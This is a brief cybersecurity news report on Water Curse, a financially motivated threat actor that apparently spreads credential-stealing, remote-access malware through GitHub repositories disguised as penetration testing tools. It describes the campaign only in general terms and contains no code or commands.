Cybersecurity analysts have unveiled a new adversary named Water Curse, known for exploiting GitHub repositories to distribute malware. This campaign features seemingly benign penetration testing tools that harbored malicious payloads intended for data theft, remote access, and system persistence. The attackers utilize multi-stage infection processes through obfuscated scripts in Visual Basic and PowerShell, alongside anti-debugging measures. Identified as financially motivated, Water Curse is linked to credential theft and unauthorized access, with extensive preparations visible in the repositories involved, demonstrating a sophisticated approach to cyberattacks.
Cybersecurity researchers have exposed a previously unknown threat actor known as Water Curse that relies on weaponized GitHub repositories to deliver multi-stage malware.
The malware enables data exfiltration (including credentials, browser data, and session tokens), remote access, and long-term persistence on infected systems.
Water Curse's arsenal incorporates a wide range of tools and programming languages, underscoring their cross-functional development capabilities to target the supply chain.
The attacks are also characterized by the use of anti-debugging techniques, privilege escalation methods, and persistence mechanisms to maintain a long-term foothold on the affected hosts.
Collection
[
|
...
]